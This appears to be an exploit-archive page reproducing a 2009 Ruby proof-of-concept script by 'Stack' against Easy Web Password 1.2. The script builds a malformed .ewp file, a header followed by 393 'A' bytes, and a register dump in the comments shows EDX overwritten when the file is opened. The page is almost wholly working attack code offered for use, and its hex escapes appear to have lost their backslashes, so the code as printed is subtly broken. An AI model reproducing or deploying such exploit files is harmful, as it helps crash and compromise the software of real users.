Easy Web Password 1.2 Local Heap Memory Consumption PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Easy Web Password 1.2 Local Heap Memory Consumption PoC
# Published : 2009-03-04
# Author : Stack
# Previous Title : Winamp <= 5.541 (mp3/aiff) Multiple Denial of Service Exploits
# Next Title : Yaws < 1.80 (multiple headers) Remote Denial of Service Exploit

#!/usr/bin/env ruby
# Easy Web Password V1.2 Local Heap Memory Consumption Proof of concept
# http://www.efssoft.com/ewpsetup.exe
# Register
# EAX 00000000
# ECX 04A43C58
# EDX 41414141  ( EDX overwrited )
# EBX 00000001
# ESP 0012A4E0
# EBP 0012F140
# ESI 0012A720
# EDI 2FDE5000
# EIP 00405AB4 EasyWebP.00405AB4
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
moad = gets.chomp.capitalize
puts "Name Of File : " + moad +'.html'
time1 = Time.new
$VERBOSE=nil
Header =   "x4Dx79x44x42x2Cx43x6Fx70x79x72x69"+
           "x67x68x74x5Fx47x75x48x6Fx6Ex67"
    
Bof    =  "x41" * 393
   
crash =  Header + Bof
 
File.open( moad+".ewp", "w" ) do |the_file|
the_file.puts(crash)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + moad +".ewp :d"
end

# www.Syue.com [2009-03-04]